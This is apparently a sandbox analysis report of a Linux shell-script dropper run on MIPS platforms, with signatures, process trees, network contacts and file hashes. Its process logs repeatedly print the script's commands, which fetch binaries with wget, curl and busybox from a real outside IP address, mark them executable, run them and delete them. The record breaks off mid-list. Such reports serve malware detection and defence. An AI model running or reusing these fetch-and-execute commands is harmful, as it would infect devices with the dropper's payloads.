Analysis Overview
SHA256
d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af
Threat Level: Shows suspicious behavior
The file d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 03:24
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
debian9-mipsbe-20240611-en
Max time kernel
72s
Max time network
74s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/chmod
[chmod 777 ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC
[./ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/bin/rm
[rm ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/wget
[wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/chmod
[chmod 777 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH
[./0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/bin/rm
[rm 0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH]
/usr/bin/wget
[wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/chmod
[chmod 777 cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6
[./cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
/bin/rm
[rm cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-28 03:24
Reported
2024-10-28 03:27
Platform
debian9-mipsel-20240226-en
Max time kernel
129s
Max time network
133s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | N/A |
| N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | N/A |
| N/A | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | N/A |
| N/A | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | N/A |
| N/A | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | N/A |
| N/A | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | N/A |
| N/A | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | N/A |
| N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
| N/A | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | N/A |
| N/A | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | N/A |
| N/A | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | N/A |
| N/A | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | N/A |
| N/A | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | N/A |
| N/A | N/A | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0Q2eF8nANbCiV2LwWm0kTxeAA1zWOLsHfH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cf6YUEdIReE7Wn7lq4kVzqa5bvolwgf7T6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd | /usr/bin/curl | N/A |
Processes
/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh
[/tmp/d6969275efae5bfe2230492af1741f5329a8a46491a6f58144e9ee58690c41af.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/chmod
[chmod 777 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
[./5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/bin/rm
[rm 5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/wget
[wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/chmod
[chmod 777 NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/tmp/NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h
[./NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/bin/rm
[rm NZQ79hdipfm5YcU1u3Endr0JCJkVkKah9h]
/usr/bin/wget
[wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/chmod
[chmod 777 vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/tmp/vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae
[./vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/bin/rm
[rm vrFIExOTl4u7cISOkoLG7AGIfiT1Ez07Ae]
/usr/bin/wget
[wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/chmod
[chmod 777 u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/tmp/u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd
[./u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/bin/rm
[rm u3kJ8a558tj1ZayEY5BrwMFFv5i3KXSRvd]
/usr/bin/wget
[wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/chmod
[chmod 777 ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/tmp/ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20
[./ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/bin/rm
[rm ScaN2jxzNdPm3TEMNLdxEGVvyIgHHEIr20]
/usr/bin/wget
[wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/chmod
[chmod 777 mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/tmp/mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i
[./mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/bin/rm
[rm mOFfPYmVvbsWjodQayVeWC8knkNgeB0w8i]
/usr/bin/wget
[wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/chmod
[chmod 777 llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/tmp/llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u
[./llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/bin/rm
[rm llnFG3akvtbzdaoWf5aQr0HZ6i72e6Rf1u]
/usr/bin/wget
[wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/chmod
[chmod 777 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/tmp/5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv
[./5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/bin/rm
[rm 5sKLMEYEB8DokArnHoHtFf4QHu3qu269kv]
/usr/bin/wget
[wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/chmod
[chmod 777 TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/tmp/TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd
[./TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/bin/rm
[rm TzqvDcWeZg38Igp5EnXVkuK6WDEqIPeBbd]
/usr/bin/wget
[wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/chmod
[chmod 777 lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/tmp/lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo
[./lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/bin/rm
[rm lZeGioOLwaUTRcfbbVzVU5iGXU3wnsyeFo]
/usr/bin/wget
[wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/chmod
[chmod 777 TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/tmp/TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj
[./TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/bin/rm
[rm TER9m66OQOq1Kt2oX5o27oQeanFUyD23Wj]
/usr/bin/wget
[wget http://87.120.126.196/bins/ha2bJmL75D0DtfCiv3CUgAOYfm2XPnJCaC]
/usr/bin/curl
